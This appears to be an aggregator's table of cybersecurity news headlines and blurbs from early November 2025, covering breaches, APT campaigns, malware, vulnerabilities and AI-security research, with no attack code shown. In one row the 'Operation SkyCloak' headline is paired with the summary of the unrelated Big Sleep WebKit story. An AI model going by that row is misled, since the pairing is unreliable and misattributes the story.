| 8.11.25 | Rising Cyber Threats to Rwanda : Hacktivists and Data Breaches | EXECUTIVE SUMMARY Between January and October 2025, Rwanda’s government infrastructure experienced a series of coordinated cyber incidents involving data leaks, credential | Cyber blog | Cyfirma |
| 8.11.25 | Cyber Threat Landscape – The United Republic of Tanzania | EXECUTIVE SUMMARY Tanzania’s cyber threat landscape has escalated in 2025, reflecting its growing digital transformation, expanding telecom sector, and increasing reliance on online platforms for governance, commerce, and public services.… | Cyber blog | Cyfirma |
| 8.11.25 | Survey of AFCEA Attendees Shows Government Shutdown Has Major Impact on Cybersecurity Readiness | The results are in from the Eclypsium survey of over 100 government employees and affiliated entities about cybersecurity risk to the U.S. Federal government and Department of Defense. | Cyber blog | Eclypsium |
| 8.11.25 | The Future of F5 Risk In The Enterprise | The major F5 security incident disclosed on October 15 is still sending ripples (or tsunamis) through the enterprises and governments worldwide. While F5 has issued patches for 44 vulnerabilities that were leaked to attackers during the breach, major concerns still linger about undiscovered or undisclosed risks to F5’s customers. | Cyber blog | Eclypsium |
| 8.11.25 | Crossed wires: a case study of Iranian espionage and attribution | In June, Proofpoint Threat Research began investigating a benign email discussing economic uncertainty and domestic political unrest in Iran. While coinciding with the escalations in the Iran-Israel conflict, there was no indication that the observed activity was directly correlated with Israel’s attacks on Iranian nuclear facilities or Iran’s actions in response. | BigBrother blog | PROOFPOINT |
| 8.11.25 | Insiders, AI, and data sprawl converge: essential insights from the 2025 Data Security Landscape report | Data security is at a critical inflection point. Organizations today are struggling with explosive data growth, sprawling IT environments, persistent insider risks, and the adoption of generative AI (GenAI). What’s more, the rapid emergence of AI agents is giving rise to a new, more complex agentic workspace, where both humans and agents interact with sensitive data. | AI blog | PROOFPOINT |
| 8.11.25 | Remote access, real cargo: cybercriminals targeting trucking and logistics | Proofpoint is tracking a cluster of cybercriminal activity that targets trucking and logistics companies and infects them with RMM tooling for financial gain. Based on our ongoing investigations paired with open-source information, Proofpoint assesses with high confidence that the threat actors are working with organized crime groups to compromise entities in the surface transportation industry — in particular trucking carriers and freight brokers — to hijack cargo freight, leading to the theft of physical goods. | Cyber blog | PROOFPOINT |
| 8.11.25 | SesameOp: Novel backdoor uses OpenAI Assistants API for command and control | Microsoft Incident Response – Detection and Response Team (DART) researchers uncovered a new backdoor that is notable for its novel use of the OpenAI Assistants Application Programming Interface (API) as a mechanism for command-and-control (C2) communications. | AI blog | Microsoft blog |
| 8.11.25 | LANDFALL: New Commercial-Grade Android Spyware in Exploit Chain Targeting Samsung Devices | Unit 42 researchers have uncovered a previously unknown Android spyware family, which we have named LANDFALL. To deliver the spyware, attackers exploited a zero-day vulnerability (CVE-2025-21042) in Samsung’s Android image processing library. The specific flaw LANDFALL exploited, CVE-2025-21042, is not an isolated case but rather part of a broader pattern of similar issues found on multiple mobile platforms. | Malware blog | Palo Alto |
| 8.11.25 | Know Ourselves Before Knowing Our Enemies: Threat Intelligence at the Expense of Asset Management | Cyber threat intelligence is often touted as a way to help defend an organization's IT environment. If we better understand the threats that might target our networks, we can better defend ourselves against those threats. This is true, but threat intelligence is only effective if an organization also properly manages its IT assets. | Cyber blog | Palo Alto |
| 8.11.25 | Microsoft WSUS Remote Code Execution (CVE-2025-59287) Actively Exploited in the Wild (Updated November 3) | On Oct. 14, 2025, a critical, unauthenticated remote code execution (RCE) vulnerability was identified in Microsoft's Windows Server Update Services (WSUS), a core enterprise component for patch management | Vulnerability blog | Palo Alto |
| 8.11.25 | Exploiting Microsoft Teams: Impersonation and Spoofing Vulnerabilities Exposed | Check Point Research uncovered four vulnerabilities in Microsoft Teams that allow attackers to impersonate executives, manipulate messages, alter notifications, and forge identities in video and audio calls. | Exploit blog | CHECKPOINT |
| 8.11.25 | Drawn to Danger: Windows Graphics Vulnerabilities Lead to Remote Code Execution and Memory Exposure | Check Point Research (CPR) identified three security vulnerabilities in the Graphics Device Interface (GDI) in Windows. We promptly reported these issues to Microsoft, and they were addressed in the Patch Tuesday updates in May, July, and August 2025. | Vulnerebility blog | CHECKPOINT |
| 8.11.25 | Beating XLoader at Speed: Generative AI as a Force Multiplier for Reverse Engineering | XLoader remains one of the most challenging malware families to analyze. Its code decrypts only at runtime and is protected by multiple layers of encryption, each locked with a different key hidden somewhere else in the binary. Even sandboxes are no help: evasions block malicious branches, and the real C2 (command and control) domains are buried among dozens of fakes. With new versions released faster than researchers can investigate, analysis is almost always a (losing) race against time. | AI blog | CHECKPOINT |
| 8.11.25 | Do robots dream of secure networking? Teaching cybersecurity to AI systems | This blog demonstrates a proof of concept using LangChain and OpenAI, integrated with Cisco Umbrella API, to provide AI agents with real-time threat intelligence for evaluating domain dispositions. | AI blog | CISCO TALOS |
| 8.11.25 | Remember, remember the fifth of November | This edition, Hazel explores the origins of Guy Fawkes Day and how heeding an anonymous warning prevented an assassination. | Cyber blog | CISCO TALOS |
| 8.11.25 | Dynamic binary instrumentation (DBI) with DynamoRio | Learn how to build your own dynamic binary instrumentation (DBI) tool with open-source DynamoRIO to enable malware analysis, security auditing, reverse engineering, and more. | Hacking blog | CISCO TALOS |
| 8.11.25 | In memoriam: David Harley | Former colleagues and friends remember the cybersecurity researcher, author, and mentor whose work bridged the human and technical sides of security | Cyber blog | Eset |
| 8.11.25 | The who, where, and how of APT attacks in Q2 2025–Q3 2025 | ESET Chief Security Evangelist Tony Anscombe highlights some of the key findings from the latest issue of the ESET APT Activity Report | APT blog | Eset |
| 8.11.25 | ESET APT Activity Report Q2 2025–Q3 2025 | An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q2 2025 and Q3 2025 | APT blog | Eset |
| 8.11.25 | Sharing is scaring: The WhatsApp screen-sharing scam you didn’t see coming | How a fast-growing scam is tricking WhatsApp users into revealing their most sensitive financial and other data | Social blog | Eset |
| 8.11.25 | How social engineering works | Unlocked 403 cybersecurity podcast (S2E6) | Think you could never fall for an online scam? Think again. Here's how scammers could exploit psychology to deceive you – and what you can do to stay one step ahead | Cyber blog | Eset |
| 8.11.25 | Ground zero: 5 things to do after discovering a cyberattack | When every minute counts, preparation and precision can mean the difference between disruption and disaster | Cyber blog | Eset |
| 8.11.25 | Tycoon 2FA Phishing Kit Analysis | In this Threat Alert, Cybereason analyzes Tycoon 2FA phishing kit, a sophisticated phishing-as-a-service platform designed to bypass two-factor authentication. | Phishing blog | Cybereason |
| 8.11.25 | Defeating KASLR by Doing Nothing at All | I've recently been researching Pixel kernel exploitation and as part of this research I found myself with an excellent arbitrary write primitive…but without a KASLR leak. As necessity is the mother of all invention, on a hunch, I started researching the Linux kernel linear mapping. | Vulnerability blog | Project Zero |
| 8.11.25 | Samsung Mobile Flaw Exploited as Zero-Day to Deploy LANDFALL Android Spyware | A now-patched security flaw in Samsung Galaxy Android devices was exploited as a zero-day to deliver a "commercial-grade" Android spyware dubbed LANDFALL in targeted attacks in the | Exploit | The Hacker News |
| 8.11.25 | From Log4j to IIS, China's Hackers Turn Legacy Bugs into Global Espionage Tools | A China-linked threat actor has been attributed to a cyber attack targeting a U.S. non-profit organization with an aim to establish long-term persistence, as part of broader activity aimed | APT | The Hacker News |
| 7.11.25 | Hidden Logic Bombs in Malware-Laced NuGet Packages Set to Detonate Years After Installation | A set of nine malicious NuGet packages has been identified as capable of dropping time-delayed payloads to sabotage database operations and corrupt industrial control systems. | Virus | The Hacker News |
| 7.11.25 | Google Launches New Maps Feature to Help Businesses Report Review-Based Extortion Attempts | Google on Thursday said it's rolling out a dedicated form to allow businesses listed on Google Maps to report extortion attempts made by threat actors who post inauthentic bad | Cyber | The Hacker News |
| 7.11.25 | Vibe-Coded Malicious VS Code Extension Found with Built-In Ransomware Capabilities | Cybersecurity researchers have flagged a malicious Visual Studio Code (VS Code) extension with basic ransomware capabilities that appears to be created with the help of artificial | Ransom | The Hacker News |
| 7.11.25 | Trojanized ESET Installers Drop Kalambur Backdoor in Phishing Attacks on Ukraine | A previously unknown threat activity cluster has been observed impersonating Slovak cybersecurity company ESET as part of phishing attacks targeting Ukrainian entities. The | Virus | The Hacker News |
| 7.11.25 | Cisco Warns of New Firewall Attack Exploiting CVE-2025-20333 and CVE-2025-20362 | Cisco on Wednesday disclosed that it became aware of a new attack variant that's designed to target devices running Cisco Secure Firewall Adaptive Security Appliance (ASA) Software | Exploit | The Hacker News |
| 6.11.25 | From Tabletop to Turnkey: Building Cyber Resilience in Financial Services | Introduction Financial institutions are facing a new reality: cyber-resilience has passed from being a best practice, to an operational necessity, to a prescriptive regulatory requirement. | Cyber | The Hacker News |
| 6.11.25 | ThreatsDay Bulletin: AI Tools in Malware, Botnets, GDI Flaws, Election Attacks & More | Cybercrime has stopped being a problem of just the internet — it's becoming a problem of the real world. Online scams now fund organized crime, hackers rent violence like a service, and | Cyber | The Hacker News |
| 6.11.25 | Hackers Weaponize Windows Hyper-V to Hide Linux VM and Evade EDR Detection | The threat actor known as Curly COMrades has been observed exploiting virtualization technologies as a way to bypass security solutions and execute custom malware. According | Hack | The Hacker News |
| 6.11.25 | SonicWall Confirms State-Sponsored Hackers Behind September Cloud Backup Breach | SonicWall has formally implicated state-sponsored threat actors as behind the September security breach that led to the unauthorized exposure of firewall configuration backup files. | Incident | The Hacker News |
| 6.11.25 | Google Uncovers PROMPTFLUX Malware That Uses Gemini AI to Rewrite Its Code Hourly | Google on Wednesday said it discovered an unknown threat actor using an experimental Visual Basic Script (VB Script) malware dubbed PROMPTFLUX that interacts with its Gemini | Virus | The Hacker News |
| 6.11.25 | Researchers Find ChatGPT Vulnerabilities That Let Attackers Trick AI Into Leaking Data | Cybersecurity researchers have disclosed a new set of vulnerabilities impacting OpenAI's ChatGPT artificial intelligence (AI) chatbot that could be exploited by an attacker to steal | AI | The Hacker News |
| 5.11.25 | Securing the Open Android Ecosystem with Samsung Knox | Raise your hand if you've heard the myth, "Android isn't secure." Android phones, such as the Samsung Galaxy, unlock new ways of working. But, as an IT admin, you may worry about the | OS | The Hacker News |
| 5.11.25 | Mysterious 'SmudgedSerpent' Hackers Target U.S. Policy Experts Amid Iran–Israel Tensions | A never-before-seen threat activity cluster codenamed UNK_SmudgedSerpent has been attributed as behind a set of cyber attacks targeting academics and foreign policy experts | APT | The Hacker News |
| 5.11.25 | U.S. Sanctions 10 North Korean Entities for Laundering $12.7M in Crypto and IT Fraud | The U.S. Treasury Department on Tuesday imposed sanctions against eight individuals and two entities within North Korea's global financial network for laundering money for various | Cryptocurrency | The Hacker News |
| 5.11.25 | CISA Adds Gladinet and CWP Flaws to KEV Catalog Amid Active Exploitation Evidence | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added two security flaws impacting Gladinet and Control Web Panel (CWP) to its Known Exploited | Vulnerability | The Hacker News |
| 4.11.25 | A Cybercrime Merger Like No Other — Scattered Spider, LAPSUS$, and ShinyHunters Join Forces | The nascent collective that combines three prominent cybercrime groups, Scattered Spider, LAPSUS$, and ShinyHunters, has created no less than 16 Telegram channels since August 8, | CyberCrime | The Hacker News |
| 4.11.25 | Europol and Eurojust Dismantle €600 Million Crypto Fraud Network in Global Sweep | Nine people have been arrested in connection with a coordinated law enforcement operation that targeted a cryptocurrency money laundering network that defrauded victims of €600 | Cryptocurrency | The Hacker News |
| 4.11.25 | Critical React Native CLI Flaw Exposed Millions of Developers to Remote Attacks | Details have emerged about a now-patched critical security flaw in the popular "@react-native-community/cli" npm package that could be potentially exploited to run malicious | Exploit | The Hacker News |
| 4.11.25 | Microsoft Teams Bugs Let Attackers Impersonate Colleagues and Edit Messages Unnoticed | Cybersecurity researchers have disclosed details of four security flaws in Microsoft Teams that could have exposed users to serious impersonation and social engineering attacks. The | CyberCrime | The Hacker News |
| 4.11.25 | Operation SkyCloak Deploys Tor-Enabled OpenSSH Backdoor Targeting Defense Sectors | Google's artificial intelligence (AI)-powered cybersecurity agent called Big Sleep has been credited by Apple for discovering as many as five different security flaws in the WebKit | CyberCrime | The Hacker News |
| 4.11.25 | Google's AI 'Big Sleep' Finds 5 New Vulnerabilities in Apple's Safari WebKit | Google's artificial intelligence (AI)-powered cybersecurity agent called Big Sleep has been credited by Apple for discovering as many as five different security flaws in the WebKit | Vulnerability | The Hacker News |
| 4.11.25 | U.S. Prosecutors Indict Cybersecurity Insiders Accused of BlackCat Ransomware Attacks | Federal prosecutors in the U.S. have accused a trio of allegedly hacking the networks of five U.S. companies with BlackCat (aka ALPHV) ransomware between May and November 2023 | Ransom | The Hacker News |
| 4.11.25 | Microsoft Detects "SesameOp" Backdoor Using OpenAI's API as a Stealth Command Channel | Microsoft has disclosed details of a novel backdoor dubbed SesameOp that uses OpenAI Assistants Application Programming Interface (API) for command-and-control (C2) | Virus | The Hacker News |
| 4.11.25 | Malicious VSX Extension "SleepyDuck" Uses Ethereum to Keep Its Command Server Alive | Cybersecurity researchers have flagged a new malicious extension in the Open VSX registry that harbors a remote access trojan called SleepyDuck. According to Secure Annex's John | Cryptocurrency | The Hacker News |
| 3.11.25 | Cybercriminals Exploit Remote Monitoring Tools to Infiltrate Logistics and Freight Networks | Bad actors are increasingly training their sights on trucking and logistics companies with an aim to infect them with remote monitoring and management (RMM) software for financial | Exploit | The Hacker News |
| 3.11.25 | The Evolution of SOC Operations: How Continuous Exposure Management Transforms Security Operations | Security Operations Centers (SOC) today are overwhelmed. Analysts handle thousands of alerts every day, spending much time chasing false positives and adjusting detection rules | Security | The Hacker News |
| 3.11.25 | Researchers Uncover BankBot-YNRK and DeliveryRAT Android Trojans Stealing Financial Data | Cybersecurity researchers have shed light on two different Android trojans called BankBot-YNRK and DeliveryRAT that are capable of harvesting sensitive data from compromised | Virus | The Hacker News |
| 3.11.25 | New HttpTroy Backdoor Poses as VPN Invoice in Targeted Cyberattack on South Korea | The North Korea-linked threat actor known as Kimsuky has distributed a previously undocumented backdoor codenamed HttpTroy as part of a likely spear-phishing attack | Virus | The Hacker News |
| 3.11.25 | Penn hacker claims to have stolen 1.2 million donor records in data breach | A hacker has taken responsibility for last week's University of Pennsylvania "We got hacked" email incident, saying it was a far more extensive breach that exposed data on 1.2 million donors and internal documents. | Incident | |
| 3.11.25 | Open VSX rotates access tokens used in supply-chain malware attack | The Open VSX registry rotated access tokens after they were accidentally leaked by developers in public repositories and allowed threat actors to publish malicious extensions in an attempted supply-chain attack. | Virus | |
| 3.11.25 | Windows 11 Build 26220.7051 released with “Ask Copilot” feature | Windows 11 Build 26220.7051 is now rolling out to testers in the Windows Insider Program, and there are at least three new features, including Ask Copilot in the taskbar. | OS | |
| 3.11.25 | China-linked hackers exploited Lanscope flaw as a zero-day in attacks | China-linked cyber-espionage actors tracked as 'Bronze Butler' (Tick) exploited a Motex Lanscope Endpoint Manager vulnerability as a zero-day to deploy an updated version of their Gokcpdoor malware. | Exploit | |
| 3.11.25 | Windows 11 tests shared Bluetooth audio support, but only for AI PCs | If you have two headphones, speakers, earbuds, or any other Bluetooth hardware, you can now use both simultaneously on a Copilot+ PC. | OS | |
| 3.11.25 | ‘We got hacked’ emails threaten to leak University of Pennsylvania data | The University of Pennsylvania suffered a cybersecurity incident on Friday, where students and alumni received a series of offensive emails from various University email addresses, claiming that data was stolen in a breach. | Incident | |
| 3.11.25 | ASD Warns of Ongoing BADCANDY Attacks Exploiting Cisco IOS XE Vulnerability | The Australian Signals Directorate (ASD) has issued a bulletin about ongoing cyber attacks targeting unpatched Cisco IOS XE devices in the country with a previously undocumented | Exploit | The Hacker News |
| 3.11.25 | Microsoft Edge gets scareware sensor for faster scam detection | Microsoft is introducing a new scareware sensor for the Microsoft Edge web browser, which helps detect scam pages more quickly and ensures that Defender SmartScreen blocks them faster. | Spam | |
| 3.11.25 | Australia warns of BadCandy infections on unpatched Cisco devices | The Australian government is warning about ongoing cyberattacks against unpatched Cisco IOS XE devices in the country to infect routers with the BadCandy webshell. | Virus | |
| 3.11.25 | Why password controls still matter in cybersecurity | Passwords still matter — and weak policies leave the door wide open. Specops Software explains how longer passphrases, smarter banned-password lists, and adaptive rotation strategies can strengthen security without frustrating users. | Security | |
| 3.11.25 | Alleged Meduza Stealer malware admins arrested after hacking Russian org | The Russian authorities have arrested three individuals in Moscow who are believed to be the creators and operators of the Meduza Stealer information-stealing malware. | Virus | |
| 3.11.25 | CISA: High-severity Linux flaw now exploited by ransomware gangs | CISA confirmed on Thursday that a high-severity privilege escalation flaw in the Linux kernel is now being exploited in ransomware attacks. | Ransom | |
| 3.11.25 | Google says Search AI Mode will know everything about you | Google wants 'AI mode' on Search to be as personal as possible, and it'll soon tap into services like Gmail or Drive to know more about you. | AI | |
| 3.11.25 | Windows zero-day actively exploited to spy on European diplomats | A China-linked hacking group is exploiting a Windows zero-day in attacks targeting European diplomats in Hungary, Belgium, and other European nations. | Exploit | |
| 3.11.25 | Ukrainian extradited from Ireland on Conti ransomware charges | A Ukrainian national believed to be a member of the Conti ransomware operation has been extradited to the United States and faces charges that could get him 25 years in prison. | Ransom | |
| 3.11.25 | Massive surge of NFC relay malware steals Europeans’ credit cards | Near-Field Communication (NFC) relay malware has grown massively popular in Eastern Europe, with researchers discovering over 760 malicious Android apps using the technique to steal people's payment card information in the past few months. | Virus | |
| 3.11.25 | CISA orders feds to patch VMware Tools flaw exploited by Chinese hackers | CISA has ordered federal agencies to patch a high-severity vulnerability in Broadcom's VMware Aria Operations and VMware Tools software, exploited by Chinese hackers since October 2024. | Exploit | |
| 3.11.25 | Major telecom services provider Ribbon breached by state hackers | Ribbon Communications, a provider of telecommunications services to the U.S. government and telecom companies worldwide, revealed that nation-state hackers breached its IT network as early as December 2024. | Incident | |
| 2.11.25 | BPO giant Conduent confirms data breach impacts 10.5 million people | American business services giant Conduent has confirmed that a 2024 data breach has impacted over 10.5 million people, according to notifications filed with the US Attorney General's offices. | Incident | |
| 2.11.25 | WhatsApp adds passwordless chat backups on iOS and Android | WhatsApp is rolling out passkey-encrypted backups for iOS and Android devices, enabling users to encrypt their chat history using their fingerprint, face, or a screen lock code. | Social | |
| 2.11.25 | Ex-L3Harris exec guilty of selling cyber exploits to Russian broker | Peter Williams, a former general manager at U.S. defense contractor L3Harris Trenchant, has pleaded guilty in U.S. District Court to stealing and selling confidential cybersecurity information to a Russian vulnerability exploit broker. | BigBrothers | |
| 2.11.25 | CISA and NSA share tips on securing Microsoft Exchange servers | The Cybersecurity and Infrastructure Security Agency (CISA) and the National Security Agency (NSA) have released guidance to help IT administrators harden Microsoft Exchange servers on their networks against attacks. | BigBrothers | |
| 2.11.25 | LinkedIn phishing targets finance execs with fake board invites | Hackers are abusing LinkedIn to target finance executives with direct-message phishing attacks that impersonate executive board invitations, aiming to steal their Microsoft credentials. | Phishing | |
| 2.11.25 | Microsoft promises more Copilot features in Microsoft 365 companion apps | Microsoft 365 companion apps will be getting more Copilot features in the coming weeks. | Security | |
| 2.11.25 | Malicious NPM packages fetch infostealer for Windows, Linux, macOS | Ten malicious packages mimicking legitimate software projects in the npm registry download an information-stealing component that collects sensitive data from Windows, Linux, and macOS systems. | Virus | |
| 2.11.25 | WordPress security plugin exposes private data to site subscribers | The Anti-Malware Security and Brute-Force Firewall plugin for WordPress, installed on over 100,000 sites, has a vulnerability that allows subscribers to read any file on the server, potentially exposing private information. | Vulnerability | |
| 2.11.25 | Canada says hacktivists breached water and energy facilities | The Canadian Centre for Cyber Security warned today that hacktivists have breached critical infrastructure systems multiple times across the country, allowing them to modify industrial controls that could have led to dangerous conditions. | Incident | |
| 2.11.25 | Microsoft fixes Media Creation Tool broken on some Windows PCs | Microsoft has confirmed that the Windows 11 Media Creation Tool (MCT) is working again on Windows 10 22H2 and Windows 11 25H2 systems. | OS | |
| 2.11.25 | Microsoft: DNS outage impacts Azure and Microsoft 365 services | Microsoft is suffering an ongoing DNS outage affecting customers worldwide, preventing them from logging into company networks and accessing Microsoft Azure and Microsoft 365 services. | Security | |
| 2.11.25 | PhantomRaven attack floods npm with credential-stealing packages | An active campaign named 'PhantomRaven' is targeting developers with dozens of malicious npm packages that steal authentication tokens, CI/CD secrets, and GitHub credentials. | Hack | |
| 2.11.25 | Microsoft fixes 0x800F081F errors causing Windows update failures | Microsoft has resolved a known issue that caused Windows updates to fail, leading to 0x800F081F errors on Windows 11 24H2 systems. | OS | |
| 1.11.25 | Windows 11 KB5067036 update rolls out Administrator Protection feature | Microsoft has released the KB5067036 preview cumulative update for Windows 11 24H2 and 25H2, which begins the rollout of the Administrator Protection cybersecurity feature and an updated Start Menu. | OS | |
| 1.11.25 | Advertising giant Dentsu reports data breach at subsidiary Merkle | Japanese advertising giant Dentsu has disclosed that its U.S.-based subsidiary Merkle suffered a cybersecurity incident that exposed staff and client data. | Incident | |
| 1.11.25 | Qilin ransomware abuses WSL to run Linux encryptors in Windows | The Qilin ransomware operation was spotted executing Linux encryptors in Windows using Windows Subsystem for Linux (WSL) to evade detection by traditional security tools. | Ransom | |
| 1.11.25 | CISA warns of two more actively exploited Dassault vulnerabilities | The Cybersecurity & Infrastructure Security Agency (CISA) warned today that attackers are actively exploiting two vulnerabilities in Dassault Systèmes' DELMIA Apriso, a manufacturing operations management (MOM) and execution (MES) solution. | Exploit | |
| 1.11.25 | Microsoft sued for allegedly tricking millions into Copilot M365 subscriptions | The Australian Competition and Consumer Commission (ACCC) is suing Microsoft for allegedly misleading 2.7 million Australians into paying for the Copilot AI assistant in the Microsoft 365 service. | Security | |
| 1.11.25 | Google Chrome to warn users before opening insecure HTTP sites | Google announced today that the Chrome web browser will load all public websites via secure HTTPS connections by default and ask for permission before connecting to public, insecure HTTP websites, beginning with Chrome 154 in October 2026. | Security | |
| 1.11.25 | TEE.Fail attack breaks confidential computing on Intel, AMD, NVIDIA CPUs | Academic researchers developed a side-channel attack called TEE.Fail that extracts secrets from a CPU's trusted execution environment (TEE), the isolated region meant to keep data safe even from a compromised host, including Intel's SGX and TDX and AMD's SEV-SNP. | Attack | |
| 1.11.25 | BiDi Swap: The bidirectional text trick that makes fake URLs look real | Attackers are abusing bidirectional text to make fake URLs look real, reviving a decade-old browser flaw now fueling new phishing tricks. Varonis reveals how the "BiDi Swap" technique works and what organizations need to watch out for. | Hack | |
| 1.11.25 | New Atroposia malware comes with a local vulnerability scanner | A new malware-as-a-service (MaaS) platform named Atroposia provides cybercriminals a remote access trojan that combines capabilities for persistent access, evasion, data theft, and local vulnerability scanning. | Virus | |
| 1.11.25 | New Herodotus Android malware fakes human typing to avoid detection | A new Android malware family, Herodotus, uses random delay injection in its input routines to mimic human behavior on mobile devices and evade timing-based detection by security software. | Virus | |
| 1.11.25 | Google disputes false claims of massive Gmail data breach | Google was once again forced to announce that it had not suffered a data breach after numerous news outlets published sensational stories about a fake breach that purportedly exposed 183 million accounts. | Incident | |
| 1.11.25 | X: Re-enroll 2FA security keys by November 10 or get locked out | X is warning that users must re-enroll their security keys or passkeys for two-factor authentication (2FA) before November 10 or they will be locked out of their accounts until they do so. | Social | |
| 1.11.25 | Ransomware profits drop as victims stop paying hackers | The number of victims paying ransomware threat actors has reached a new low, with just 23% of the breached companies giving in to attackers' demands. | Ransom | |
| 1.11.25 | Windows will soon prompt for memory scans after BSOD crashes | Microsoft has started testing a new feature that prompts Windows 11 users to run a memory scan when logging in after a blue screen of death (BSOD). | OS | |
| 1.11.25 | QNAP warns of critical ASP.NET flaw in its Windows backup software | QNAP warned customers to patch a critical ASP.NET Core vulnerability that also impacts the company's NetBak PC Agent, a Windows utility for backing up data to a QNAP network-attached storage (NAS) device. | Vulnerability | |
| 1.11.25 | Italian spyware vendor linked to Chrome zero-day attacks | A zero-day vulnerability in Google Chrome exploited in Operation ForumTroll earlier this year delivered malware linked to Italian spyware vendor Memento Labs, born after IntheCyber Group acquired the infamous Hacking Team. | BigBrothers | |
| 1.11.25 | Google says everyone will be able to vibe code video games | A Google AI Studio product lead teased that everyone will be able to vibe code video games by the end of the year. | Security | |
| 1.11.25 | Microsoft: New policy removes pre-installed Microsoft Store apps | Microsoft now allows IT administrators to remove pre-installed Microsoft Store apps (also known as in-box apps) using a new app management policy. | Security | |
| 1.11.25 | CISA orders feds to patch Windows Server WSUS flaw used in attacks | The Cybersecurity and Infrastructure Security Agency (CISA) ordered U.S. government agencies to patch a critical-severity Windows Server Update Services (WSUS) vulnerability after adding it to its catalog of security flaws exploited in attacks. | Vulnerability | BleepingComputer |
| 1.11.25 | Tracking an evolving Discord-based RAT family | RL's analysis of an STD Group-operated RAT yielded file indicators to better detect the malware and two YARA rules. | Malware blog | REVERSINGLABS |
| 1.11.25 | Ukrainian organizations still heavily targeted by Russian attacks | Attackers are gaining access using a custom, Sandworm-linked webshell and are making heavy use of Living-off-the-Land tactics to maintain persistent access. | BigBrother blog | SECURITY.COM |
| 1.11.25 | BRONZE BUTLER exploits Japanese asset management software vulnerability | The threat group targeted a LANSCOPE zero-day vulnerability (CVE-2025-61932) | APT blog | SOPHOS |
| 1.11.25 | Cloud Abuse at Scale | FortiGuard Labs analyzes TruffleNet, a large-scale campaign abusing AWS SES with stolen credentials and linked to Business Email Compromise (BEC). | Spam blog | FORTINET |
| 1.11.25 | Stolen Credentials and Valid Account Abuse Remain Integral to Financially Motivated Intrusions | FortiGuard IR analysis of H1 2025 shows financially motivated actors increasingly abusing valid accounts and legitimate remote access tools to bypass detection, emphasizing the need for identity-centric defenses. | Hacking blog | FORTINET |
| 1.11.25 | Silent Push Unearths AdaptixC2's Ties to Russian Criminal Underworld, Tracks Threat Actors Harnessing Open-Source Tool for Malicious Payloads | Silent Push Threat Analysts have uncovered threat actors using AdaptixC2, a free and open-source Command and Control (C2) framework commonly used by penetration testers, to deliver malicious payloads. | Hacking blog | Silent Push |
| 1.11.25 | Silent Push 2026 Predictions | The Silent Push Threat Intelligence team discussed what we see as some of the greatest threats and motivators the global community will encounter in the New Year. Here are our 2026 predictions: | Security blog | Silent Push |
| 1.11.25 | | Privileged access stands as the most critical pathway for adversaries seeking to compromise sensitive systems and data. Its protection is not only a best practice, it is a fundamental imperative for organizational resilience. | Security blog | Google Threat Intelligence |
| 1.11.25 | | A new ideologically-motivated threat actor with growing technical capabilities has emerged: Hezi Rash. This Kurdish ... | APT blog | CHECKPOINT |
| 1.11.25 | Weaponized Military Documents Deliver Advanced SSH-Tor Backdoor to Defense Sector | Military-themed lures delivered in weaponized ZIP archives, backed by hidden tunneling infrastructure, target the defense sector | Malware blog | Cyble |
| 1.11.25 | Hacktivist Attacks on Critical Infrastructure Surge: Cyble Report | Hacktivist attacks on industrial control systems (ICS) nearly doubled over the course of the third quarter. | Hacking blog | Cyble |
| 1.11.25 | The Week in Vulnerabilities: Oracle, Microsoft & Adobe Fixes Urged by Cyble | Critical vulnerabilities from Oracle, Microsoft and Adobe are just a few of the flaws meriting high-priority attention by security teams. | Vulnerability blog | Cyble |
| 1.11.25 | When Money Moves, Hackers Follow: Europe’s Financial Sector Under Siege | Europe’s BFSI sector faces growing deepfake and ransomware threats. CISOs focus on intelligence, resilience, and rapid response to stay ahead. | Ransom blog | Cyble |
| 1.11.25 | APT-C-60 Escalates SpyGlace Campaigns Targeting Japan with Evolved Malware, Advanced Evasion TTPs | APT-C-60 intensified operations against Japanese organizations during Q3 2025, deploying three updated SpyGlace backdoor versions with refined tracking mechanisms, modified encryption, and sophisticated abuse of GitHub, StatCounter, and Git for stealthy malware distribution. | APT blog | Cyble |
| 1.11.25 | From Human-Led to AI-Driven: Why Agentic AI Is Redefining Cybersecurity Strategy | Agentic AI marks the next leap in cybersecurity—autonomous systems that detect, decide, and act in real time, transforming how organizations defend against threats. | AI blog | Cyble |
| 1.11.25 | Operation SkyCloak: Tor Campaign targets Military of Russia & Belarus | Authors: Sathwik Ram Prakki and Kartikkumar Jivani. SEQRITE Labs has identified a campaign... | Hacking blog | Seqrite |
| 1.11.25 | Investigation Report: Android/BankBot-YNRK Mobile Banking Trojan | This report covers the analysis and findings related to three Android application packages (APKs) | Malware blog | Cyfirma |
| 1.11.25 | AI Security: NVIDIA BlueField Now with Vision One™ | Launching at NVIDIA GTC 2025 - Transforming AI Security with Trend Vision One™ on NVIDIA BlueField | AI blog | Trend Micro |
| 1.11.25 | Active Water Saci Campaign Spreading Via WhatsApp Features Multi-Vector Persistence and Sophisticated C&C | Continuous investigation on the Water Saci campaign reveals innovative email-based C&C system, multi-vector persistence, and real-time command capabilities that allow attackers to orchestrate coordinated botnet operations, gather detailed campaign intelligence, and dynamically control malware activity across multiple infected machines. | Hacking blog | Trend Micro |
| 1.11.25 | Oracle E-Business Suite Under Siege: Active Exploitation of Dual Zero-Days | The SonicWall Capture Labs threat research team became aware of multiple remote code execution vulnerabilities in Oracle E-Business Suite, assessed their impact and developed mitigation measures. | Exploit blog | SonicWall |
| 1.11.25 | HijackLoader Delivered via SVG files | The SonicWall Capture Labs threat research team has recently been monitoring new variants of the HijackLoader malware that are being delivered through SVG files. | Malware blog | SonicWall |
| 1.11.25 | Bots, Bread and the Battle for the Web | Meet Sarah, an artisanal baker who opens Sarah’s Sourdough. To improve her search engine optimization (SEO), she builds a beautiful website and shares authentic baking content. | BotNet blog | Palo Alto |
| 1.11.25 | Suspected Nation-State Threat Actor Uses New Airstalk Malware in a Supply Chain Attack | We have discovered a new Windows-based malware family we've named Airstalk, which is available in both PowerShell and .NET variants. We assess with medium confidence that a possible nation-state threat actor used this malware in a likely supply chain attack. We have created the threat activity cluster CL-STA-1009 to identify and track any further related activity. | Hacking blog | Palo Alto |
| 1.11.25 | When AI Agents Go Rogue: Agent Session Smuggling Attack in A2A Systems | We discovered a new attack technique, which we call agent session smuggling. This technique allows a malicious AI agent to exploit an established cross-agent communication session to send covert instructions to a victim agent. | AI blog | Palo Alto |
